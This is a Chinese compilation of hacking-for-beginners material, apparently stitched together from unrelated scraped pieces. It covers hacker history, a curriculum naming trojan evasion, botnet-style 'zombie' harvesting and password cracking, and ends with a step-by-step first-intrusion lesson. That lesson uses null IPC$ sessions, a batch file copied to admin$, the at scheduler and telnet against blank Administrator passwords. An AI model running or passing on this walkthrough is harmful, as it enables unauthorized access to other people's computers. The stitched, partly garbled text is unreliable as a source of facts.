黑客基础知识
黑客入门(超级详细版)(高清版)
一.黑客的分类和行为 以我的理解,“黑客”大体上应该分为“正”、“邪”两类,正派黑客依靠自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善,而邪派黑客则是通过各种黑客技能对系统进行攻击、入侵或者做其他一些有害于网络的事情,因为邪派黑客所从事的事情违背了《黑客守则》,所以他们真正的名字叫“骇客”(C r a c k e r)而非“黑客”(H a c k e r),也就是我们平时经常听说的“黑客”(C a c k e r)和“红客”(H a c k e r)。
无论那类黑客,他们最初的学习内容都将是本部分所涉及的内容,而且掌握的基本技能也都是一样的。
即便日后他们各自走上了不同的道路,但是所做的事情也差不多,只不过出发点和目的不一样而已。
很多人曾经问我:“做黑客平时都做什么?是不是非常刺激?”也有人对黑客的理解是“天天做无聊且重复的事情”。
实际上这些又是一个错误的认识,黑客平时需要用大量的时间学习,我不知道这个过程有没有终点,只知道“多多益善”。
由于学习黑客完全出于个人爱好,所以无所谓“无聊”;重复是不可避免的,因为“熟能生巧”,只有经过不断的联系、实践,才可能自己体会出一些只可意会、不可言传的心得。
在学习之余,黑客应该将自己所掌握的知识应用到实际当中,无论是哪种黑客做出来的事情,根本目的无非是在实际中掌握自己所学习的内容。
黑客的行为主要有以下几种:一、学习技术:互联网上的新技术一旦出现,黑客就必须立刻学习,并用最短的时间掌握这项技术,这里所说的掌握并不是一般的了解,而是阅读有关的“协议”(r f c)、深入了解此技术的机理,否则一旦停止学习,那么依靠他以前掌握的内容,并不能维持他的“黑客身份”超过一年。
初级黑客要学习的知识是比较困难的,因为他们没有基础,所以学习起来要接触非常多的基本内容,然而今天的互联网给读者带来了很多的信息,这就需要初级学习者进行选择:太深的内容可能会给学习带来困难;太“花哨”的内容又对学习黑客没有用处。
第1课:黑客基础知识
黄鑫:网名冰河(glacier),“冰河木马”软 件的创作者,被称为木马教父;
小榕:号称刀光雪影,一个月黑掉1000家网 站,1999中美黑客大战,带领红客抗击美国 黑客;
黑客人物(三) 6 7
中国十大黑客
8
9
10
黄鑫:网名Goodwill,绿色兵团创始人,COG 发起人,wifi万能钥匙首席安全官;
黑客事件
小咖 级别
1.黑你的电脑:用连过公共 wifi的电脑给他挖矿。
2.黑你的银行卡:2013 年海燕 3 号专案,一个广西 17 岁的 “黑客” 获取了 160 万条个人信息和银行卡账号,其中可以 直接网上盗刷的银行卡信息 19 万条,涉案金额 14.98 亿余元。
人物经历
4
5 6
18岁:1981年,潜入洛杉矶市电话中心盗取 用户密码;被判监禁3个月和1年监督居住。
20岁:1983年,进入了美国五角大楼的电脑ቤተ መጻሕፍቲ ባይዱ;被判在加州的青年管教所管教6个月。
25岁:1988年,从中国东方电气集团公司( DEC)网络上盗取价值100万美元的软件;被 判1年有期徒刑。
26岁:1989年,成功地侵入多家世界知名高 科技公司的电脑系统后神秘失踪。他被指控 犯有23项罪,后又增加25项附加罪。
很多黑客把自己的技术诀窍用于 犯罪活动,包括盗版软件、创建 病毒和侵入系统以盗取敏感信息。
80年代
出现玩弄电话系统的黑客,亦称 “飞客”
黑客发展
乘着80年代巨大变革的东风,90 年代是黑客真正开始臭名远扬的 起点。
90年代 00年代
10年代世界计算机系统一直在升 级,技术一直在创新,黑客们—— 无论白帽子还是黑帽子,依然不
黑客基础知识入门
黑客基础知识入门黑客,这个词在当今社会中越来越为人所熟知。
然而,对于大多数人来说,黑客仍然是一个神秘而陌生的存在。
本文将为您介绍黑客的基础知识,帮助您更好地了解黑客的本质和相关技术。
一、什么是黑客黑客一词最初源于计算机技术领域,特指那些对计算机系统进行探索、创新和改进的人。
黑客通常具备深厚的技术功底和对计算机系统结构的独到理解。
他们通过分析系统漏洞,发现安全隐患,并提出相应的修补建议。
与此同时,黑客也可以利用这些知识来追求个人或者非法的目的。
二、黑客分类根据黑客的行为和动机,我们可以将他们分为三类:白帽黑客、灰帽黑客和黑帽黑客。
1. 白帽黑客是拥有合法授权,以维护网络安全为目的的黑客。
他们通常是安全专家或者公司雇员,负责测试系统漏洞和提出改进建议,以保护网络免受潜在攻击。
2. 灰帽黑客是既有善意又有恶意的黑客,他们对系统进行拓扑探测,同时也可能窃取或者破解一些信息。
3. 黑帽黑客是指那些恶意入侵计算机系统的人。
他们通过违法手段获取他人计算机系统中的敏感信息,或者滥用其权限去破坏网络安全。
三、黑客技术黑客技术是黑客行为的重要表现形式,他们通过不同的技术手段来实现他们的目标。
1. 漏洞利用:黑客通过分析软件或者系统中的漏洞,利用这些漏洞来获取未授权的访问权限。
这些漏洞可能是软件程序编写时疏忽造成的,也可能是系统设计过程中的问题所导致。
2. 社交工程:社交工程是指通过与目标用户沟通交流,获取对方敏感信息或者密码的一种手段。
黑客通过伪装成别人,利用人们的信任和好奇心来欺骗他人,从而获取所需信息。
3. 网络钓鱼:黑客通过伪造合法的电子邮件或者网站,诱使用户输入个人账号和密码等敏感信息。
一旦用户被诱骗点击并输入信息,黑客就能够获取用户的账号权限。
四、如何防范黑客攻击了解黑客技术后,我们也应该意识到保护自己的网络安全至关重要。
以下是一些防范黑客攻击的基本建议。
1. 使用复杂的密码:为了防止黑客破解密码,我们应该选择复杂且不易猜测的密码。
如何成为一名黑客
如何成为一名黑客?以下分三个部分讲述黑客必备知识,以供大家有一个详细的网络安全学习计划。
一.系统管理员部分第一部分:计算机基础和应用知识。
包括软硬件,系统配置,WINDOWS管理工具的运用,系统安装,硬盘分区等。
第二部分:网络基础知识。
OSI,TCP/IP模型,常见的网络协议,WINDOWS下常见协议。
局域网的组建等第三部分:网络操作系统。
WINDOWS SERVER,LINUX的日常使用,系统配置,性能监控,各种服务的配置。
第四部分:计算机常见故障,网络常见故障的解决。
注册表的设置。
二.数据库与编程第一部分:熟练掌握SQL语句。
精通SQL SERVER/ORACLE.第二部分:掌握编程语言:C,C++/JA VE 了解汇编。
精通ASP脚本语言。
BAT批处理。
第三部分:精通LINUX三.黑客攻防第一部分:基础篇1.端口·木马·安全·扫描应用知识;Windows系统进程完全解析,系统端口全面讲解。
常见端口的入侵与安全防范;2.虚拟机的使用。
虚拟机上网,共享,常用使用的设置与使用3.灰鸽子部分。
灰鸽子的配置;配置隐蔽性灰鸽子服务端与上线;制作全免杀黑防灰鸽子;灰鸽子手工清除;4.工具篇。
音速启动,TFTP,Fport,X-SCAN,注入工具—domain,网站猎手批量注入技术,WinRAR 捆绑木马,啊D工具包5.菜鸟进阶。
制作个人专版免杀捆绑机;制作自解压式radmin远控软件;隐式挂马方式;命令行下向肉鸡传文件;让XP肉鸡终端服务实现多用户登陆;木马伪装,捆绑技术综合。
3389/135肉鸡;sa 弱口令&1433端口溢出;42端口溢出得肉鸡服务器;利用BT和讯雷抓肉鸡;破解邮箱密码;攻破ADSL宽带密码及防范;经典的反盗号技巧;批量扫五六位QQ密码;在网站中插超隐蔽的ASP 后门;利用NC手工制作超级免杀服务级后门;利用超级网络钓鱼术与伪装术得肉鸡;.网络渗透技术;arp欺骗;Windows日志与入侵检测。
学黑客需要学的知识点
学黑客需要学的知识点黑客一词源于英文hacker,最初被用于形容计算机领域具有卓越技能的人。
但随着时间的推移,黑客的定义变得更加复杂,涵盖了更广泛的领域。
学习黑客需要掌握一系列技能和知识点,下面将逐步介绍。
1.基础计算机知识黑客需要对计算机的基本原理和操作有深入的了解。
这包括计算机硬件、操作系统、网络协议等。
掌握这些知识将帮助你更好地理解计算机系统的工作原理,为后续的学习和实践奠定基础。
2.编程语言学习编程语言是成为一名优秀黑客的关键。
掌握一门或多门编程语言,如Python、C++、Java等,将使你能够编写自己的软件程序,并更好地理解其他人编写的代码。
编程能力是黑客攻击和防御中的重要一环。
3.网络安全知识网络安全是黑客学习的核心内容。
学习网络安全知识将使你能够理解不同类型的攻击和防御技术。
了解常见的网络漏洞、攻击技术和防御机制,如SQL注入、跨站脚本、DDoS攻击等,将有助于你成为一名有竞争力的黑客。
4.操作系统安全了解不同操作系统的安全机制和弱点是学习黑客的关键一步。
掌握Linux系统的命令行操作和常用工具,了解Windows系统的漏洞和防御措施,将使你能够更好地利用系统漏洞或加强系统安全。
5.数据库知识数据库是现代应用中常见的数据存储方式。
了解数据库的原理、结构和安全性将有助于你在黑客攻击和数据泄露方面有更多的了解和技巧。
学习SQL语言和一些主流数据库系统,如MySQL、Oracle等,将使你能够更好地操作和保护数据。
6.密码学密码学是黑客学习中的重要领域。
了解对称加密和非对称加密的原理、常见的加密算法和破解方法,将使你能够更好地理解密码学的基本概念和应用,为密码破解和保护提供基础。
7.社会工程学社会工程学是黑客攻击中的重要手段。
学习社会工程学将使你能够更好地了解人类心理和行为,并利用这些知识进行社交工程攻击。
这包括欺骗、钓鱼等手段,通过社交工程获取目标的敏感信息。
8.漏洞研究和利用学习漏洞研究和利用将使你能够发现和利用软件和系统中的漏洞。
从零开始学习黑客技术入门教程(基础)
最简单的黑客入门教程目录1 黑客简介 (2)2 保护自己电脑绝对不做黑客肉鸡 (2)3 抓肉鸡的几种方法 (5)4 防止黑客通过Explorer侵入系统 (9)5 SQL注入详解 (10)5.1 注入工具 (11)5.2 php+Mysql注入的误区 (11)5.3 简单的例子 (12)5.4 语句构造 (14)5.5 高级应用 (22)5.6 实例 (26)5.7 注入的防范 (29)5.8 我看暴库漏洞原理及规律1 (29)5.9 我看暴库漏洞原理及规律2 (32)6 跨站脚本攻击 (34)6.1 跨站脚本工具 (34)6.2 什么是XSS攻击 (35)6.3 如何寻找XSS漏洞 (35)6.4 寻找跨站漏洞 (36)6.5 如何利用 (36)6.6 XSS与其它技术的结合 (37)7 XPath注入 (38)7.1 XPath注入介绍 (38)7.2 XPath注入工具 (41)声明:文章来源大多是网上收集而来,版权归其原作者所有。
1黑客简介"黑客"(hacker)这个词通常被用来指那些恶意的安全破坏者。
关于"黑客"一词的经典定义,最初来源于麻省理工学院关于信息技术的一份文档,之后便被新闻工作者们长期使用。
但是这个在麻省理工被当做中性词汇的术语,却逐渐被新闻工作者们用在了贬义的环境,而很多人也受其影响,最终导致了"黑客"一词总是用于贬义环境。
有些人认为,我们应该接受"黑客"一词已经被用滥并且有了新的意义。
他们认为,如果不认可这种被滥用的词汇,那么将无法与那些不懂技术的人进行有效的交流。
而我仍然认为,将黑客和恶意的骇客(cracker)分开表述,对交流会更有效,比如使用"恶意的安全骇客"会更容易让对方理解我所指的对象,从而能够达到更好的沟通交流效果,也避免了对"黑客"一词的滥用。
怎样成为黑客,需要学哪些计算机知识
怎样成为黑客,需要学哪些计算机知识怎样成为黑客,需要学哪些计算机知识?想要成为一名网络黑客,小编告诉大家,必须掌握以下内容:
1.C语言、汇编语言,基本上黑客新手都要学到。
2.计算机原理
分析程序数据没有十进制,只有2进制和16进制,要懂得基本运算。
还有big/little-endian 等基本术语,会用WinHex/UltraEdit 或VS的dempbin分析程序。
3.网络
包括TCP/IP,会截取数据包,还有分析frame,结合telnet/ftp/c 语言的socket 等命令进行网络打劫。
4.系统的认知
这一方面需要大家了解windows内部的API、sockets编程、IP proxy等。
以上所介绍的那些都是基础,然后熟练掌握各种操作流程,可以强行进行telnet,或进行TCP hijack,或夺取远程sid等。
其实,想要成为黑客,还有很多计算机知识要学。
与其自己上网找一些乱七八糟的教程,还不如花些钱和时间,找一个专业的培训班系统的学习。
(ps:本文章由北大青鸟广安门校区搜集自互联网)。
HACK入门(黑客技术)
4)热点的帖子:一般体现在回复率上,这类帖子并不一定是关于技术的,但他一定是人们现在最关心的(否则哪里会有那么多回复),多看看这类帖子,你将获得更丰富的知识。
5)高效的提问:对于同样的一个问题,不同的提问方式,将会受到不同的效果,能得到你最想要得答案,就是高效的提问。那么如何高效的提问呢?
(1)帖子标题写清楚:像‘快来救我呀’‘谁知道为什么’‘高手请进’这类的帖子,我是很少光顾的,一个好的标题要能概括帖子的主要内容;
(2)内容尽量详细:原因很简单,连问题都说不清楚,谁会帮你,谁能帮你(神仙??);要说明问题出现的环境,不同的环境会有不同的结果;
3结合法:就是将以上两种方法结合,这是很好的一种方法,建议大家使用。
四 总结
以上基本上是我个人的一面之谈,难免主观一些,请海涵。如果你还有什么好的学习方法,请一定要告诉我,我会收入到这片帖子当中,希望她能对菜鸟们有所帮助。
*如果你是一只想飞的菜鸟,那么就学着去搜索吧。
2 阅读书籍
hack学习中,书籍是必不可少的,这个我不用多少,只是希望大家能有选择的购买书籍,找到最适合自己的那一种。
1)基础知识类:一般来说菜鸟的基础是比较差的,甚至一些基本常识都不知道,因此有几本基础知识的书作为参考是必不可少的,比如关于 TCP/IP,网络,操作系统,局域网等,甚至是关于DOS,windows基础的书都是很有必要的。在读书的过程中,你一定会遇到许多不懂的名字或术语,该怎么办呢?白学了??去搜索吧!!
黑客需要学到的知识
一、摘要黑客不是一种职业,而是一种精神;不断学习、不断进取!!二、作为黑客需要学习的知识:主要有:基础C语言、C++、汇编语言、反汇编、LINUX、操作系统、HOW WHY免杀可以学习的网址:黑吧安全网、黑夜网络学习吧、黑鹰、华夏、黑基、凡客网络、学生黑客联盟三、主要思路或是学习的地推关系:谭浩强的《C程序课程设计》、再看《C和指针》、再看《C深度解剖》、再看《C深度解剖》、再看《C 陷阱和缺陷》、再看《C专家编程》、再看《LINUX命令》、再看《LINUX SHELL 命令》、再看《KINUX下的C编程》、再看《数据结构》、再看《欺骗的艺术》、再看《HTML》、再看《ASP PHP JSP》、再看《数据库》、再看《SHELLCODE挖掘与编写》、再来看《C++》、再来学《VC主学MFC》、然后学《汇编》、《破解》、《高级免杀》、《渗透和内核》!前言或许你并不是想成为一个黑客而是好奇,或许你只是为了高超的技术。
无论是什么都需要刻苦的去学习,没有什么事情是不付出努力就能轻易收获成功的,之所以叫做成功是因为那个人拥有着与众不同的本领,如果你想拥有超群的本领就要不断地去学习,耳而学习是要讲究一定的效率的!我知道一个人支撑起一个站很难,不过当我撑到不难的时候我知道我的日子会很好过!先说说很多朋友们的烦恼,是不是每次进一个论坛或者在百度上搜索一片菜鸟文章都要很费劲的去读,甚至看到几行就没有信心再看下去了,因为读不懂。
原有的充满好奇的自信心也随之而逝,最后因为难以继续学习下去而放弃了黑客!我曾今有过深深地体会,好比在一天狭窄的小路上,当你选择交通工具是你就必须考虑到时自行车、汽车、还是步行选择好的方法才能得到一条捷径。
下面我把大致的一天菜鸟路径该苏大家,也是我几年来东一条路西一条路走出来的捷径!但要记得。
不付出努力即使一米长的小路,你不买腿一样一事无成,要学就得做好下苦心的准备,不是说你今天按照别人做好的动画跟着去做刷到了几个QB就说明你是黑客了,你内心的喜悦如果能唤醒对黑客技术的兴趣,那还是值得的。
1黑客入门必修知识
SQL Slammer蠕虫
Slammer的传播数度比“红色代码”快两个数量级 在头一分钟之内,感染主机数量每8.5秒增长一倍; 3分钟后该病毒的传播速度达到峰值(每秒钟进行5500 万次扫描); 接下来,其传播速度由于自身挤占了绝大部分网络带宽 而开始下降; 10分钟后,易受攻击的主机基本上已经被感染殆尽
4) 网络安全概念
网络安全的意义 所谓“网络安全”,是指网络系统的硬 件、软件及其系统中的数据受到保护,不因 偶然的或者恶意的原因而遭到破坏、更改、 泄露,系统可以连续可靠正常地运行,网络 服务不被中断。
5)网络攻击与防御
进攻和防御是对立统一的矛盾体。 必须树立“积极防御”的网络战指导思想, 因为在网络战中“进攻未必就是最好的防 御”。 “网络防御作战”的成熟研究,是网络战 尽早达到“攻防平衡”的前提和基础。
远程攻击
之间的关系
D.攻击分类
在最高层次,攻击被分为两类: 主动攻击:包含攻击者访问他所需要信息 的故意行为。主动攻击包括拒绝服务攻击、 信息篡改、资源使用、欺骗等攻击方法。 被动攻击:主要是收集信息而不是进行访 问,数据的合法用户对这种活动一点也不 会觉察到。被动攻击包括嗅探、信息收集 等攻击方法。
2. 公安部开展2008年度信息网络安全状况调查 公安部公共信息网络安全监察局于2008年度开展的全国 信息网络安全状况和计算机病毒疫情调查数据显示,我国信 息网络安全事件发生比例为62.7%;计算机病毒感染率为 85.5%,说明我国互联网安全状况依然严峻。其中多次发生 网络安全事件的比例为50%,多次感染病毒的比例为66.8%, 说明我国互联网用户的网络安全意识仍比较薄弱,对发生网络 安全事件未给予足够重视。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
前言:你是不是很想做黑客呢?是不是经常周游于各个黑客站点呢?学黑客是真的很难的!它需要你有足够的耐性!毅力!只有持之以恒才能有所成就!好了~灌了那么多的水,下面就开始吧!注意:本文只适合新手!已入门的请去看别的技术文章吧!下面就用我仅仅知道的知识让你们取得第一次的成功吧!\\操作系统拜托你装个2000的好不好?不要再问为什么了~\\(本文注释用"\\注释内容\\"标记!
第一节课:命令的使用
你必须懂得一些命令才能更好地运用!总不能一边入侵一边去看例文吧!(什么?你喜欢?我晕了~)好了~下面就看看一些常用的命令吧!也就是入侵必须懂得的基本命令!如果你连这都栏得看的话你就可以放学了~放你的长假去吧!
NET [ ACCOUNTS │COMPUTER │CONFIG │CONTINUE │FILE │GROUP │HELP │
HELPMSG │LOCALGROUP │NAME │PAUSE │PRINT │SEND │SESSION │
SHARE │START │STA TISTICS │STOP │TIME │USE │USER │VIEW ]
上面就是net命令.你可以在cmd下键入net/?获得.我们看看一些常用的.
net user \\列举所有用户\\ 例子:c:\>net user
net localgroup \\把用户分组\\ 例子:c:\>net localgroup administrators guest /add \\把guest 用户加到管理组.需要有足够的权限才能进行操作!\\
net share \\显示共享资源\\ 例子:c:\>net share
net start \\启动服务,或显示已启动服务的列表\\ 例子:\>net start 例子:\>net start telnet \\启动telnet\\
net stop \\停止Windows2000网络服务\\ 例子c:\>net stop telnet \\停止telnet服务\\
net time \\显示时间\\ 例子:c:\>net time 127.0.0.1 \\显示127.0.0.1的时间\\
net use \\显示关于计算机连接的信息\\ 例子:c:\>net use
net view \\显示域列表、计算机列表或者由指定计算机共享的资源\\ 例子:c:\>net view
net的基本命令就到此结束吧!但并不是说其它的命令不用去学!只是我的基本教学(入侵)
课程需要用的命令是这些而已~自己去windows帮助那里看看吧!DOS下的基本命令是很重要的!如:copy等.还有ftp等等重要的命令因为种种原因请各位自行去看.(基本课程不能太复杂的,OK?!!!)好了~下课~
第二节课:端口和木马
A.第二节课了~这节课我们首先来学习一下端口吧!什么是端口?就是计算机和外界连接的通道!例如我们看网页用的实际上是80端口.
1)、telnet登录的端口(23/tcp)
这个信息表明远程登录服务正在运行,在这里你可以远程登录到该主机.
2)、WWW(80/TCP)端口
它表明WWW服务在该端口运行
别告诉我你不知道WWW服务是什么哦,也就是说,如果有网站的服务器都有80端口。
3)、FTP(21/tcp)
ftp服务和TELNET服务一样,你还可以从FTP服务器上获得或上传资料木马等,有的还是匿名登陆的,不过这样的好事好像不多。
4)、finger (79/tcp) 端口
finger服务对入侵者来说是一个非常有用的信息,从它可以获得用户信息,查看机器的运行情况等。
5)、远程控制(3389)
这个端口用于远程登陆.
还有一些常见的端口例如110,135,139,25等等等.....我们这次基础教程需要用到的是23端口.其它的因为觉得重要所以也列举了出来.剩下的请自己去补补.(不是我不负责任.是课程的问题!请谅解!)PS:并不是所有的端口都是有用的.
B.木马
讲个故事给大家听吧!---->>传说希腊人围攻特洛伊城,久久不能得手。
后来想出了一个木马计,让士兵藏匿于巨大的木马中。
大部队假装撤退而将木马摈弃于特洛伊城下,让敌人将其作为战利品拖入城内。
木马内的士兵则乘夜晚敌人庆祝胜利、放松警惕的时候从木马中爬出来,与城外的部队里应外合而攻下了特洛伊城。
木马的危害性是很大的!例如冰河等木马甚至可以远程控制你的电脑!同时木马也会打开一些端口.你也可以借查看端口来看看有没木马在你的电脑上运行.不过有的木马是利用已有的端口的.这个就比较麻烦了.需要用杀毒软件帮忙了~ \\我们的课程并不需要使用到木马.只是本人认为各位值得一学\\
第三节课:ipc入侵.
好了~估计你们看了那么多基础的东西已经很不耐烦了~这节课就来实行你的第一次入侵吧!咳咳~放下你的AK-47,我们不需要那个家伙....
A.什么是ipc?
IPC$是共享“命名管道”的资源,它对于程序间的通讯很重要。
在远程管理计算机和查看计算机的共享资源时使用.利用IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得到目标主机上的用户列表。
用“流光”的IPC$探测功能,就可以得到用户列表了,并可以配合字典,进行密码尝试。
B.OK!运用你在上两节课学到的知识跟我冲吧!掌握好你的命令使用了吗?
需要用的的扫描软件:xscan 操作系统:win2000(不要告诉我你那还是98或者me,我马上K了你!)
首先我们使用扫描器扫描一个IP段.打开xscan,选择"设置",再选"扫描模块",然后只选nt 弱口令的那项.确定后选"设置","扫描参数"然后填入IP段.就127.0.0.1-127.0.0.255吧!(注意:IP 段纯属虚构.)
假设我们已经扫到一个了.127.0.0.2 用户名:Administrator 密码:空(唉~真搞不清现在的人为什么这么没安全意识...)
打开cmd,输入:net use \\127.0.0.1\ipc$ "" /user:"Administrator" 命令成功完成.OK!下一步~
at \\127.0.0.1 \\这步纯属个人习惯.因为我想知道他开了AT没有.没开就放弃吧\\
接下来我们需要编辑一个批处理文件.打开记事本,输入如下内容:@net start telnet 然后保存为a.bat \\注意扩展名!是bat!\\
编辑好后就继续吧! copy a.bat \\127.0.0.1\admin$ \\admin$就是放在目标winnt的根目录下\\
net time \\127.0.0.1 \\看看目标的时间吧!有用的~\\
假设是晚上9点.接着下一步吧!
at \\127.0.0.1 20:01 a.bat \\用AT命令让目标运行a.bat.注意时间要24小时制的!\\
net time \\127.0.0.1 \\看看到时间没?\\
假设到了,我们就实行下一步吧!
telnet 127.0.0.1 \\登陆到对方的机子上.刚才的那个批处理就是用来打开它的23端口的~\\
接着输入用户名和密码\\就是用户Administrator啊!密码是空的.回车就行了~\\
OK!一切成功!现在你可以做你想做的事了~例如添加用户等等(就是命令的使用啊!所以说命令重要!)
请同学们注意不要乱删除别人的东西!我们只是学习技术.谁乱动我立即把他开除.
---------------基础课程<完>
好了~现在你们应该可以去实行自己的第一次入侵了~当然实际操作中并不全像上
面的那么容易.会出现很多问题的.例如at不能执行.telnet上去时需要验证等等.这就留待你们自己去解决了。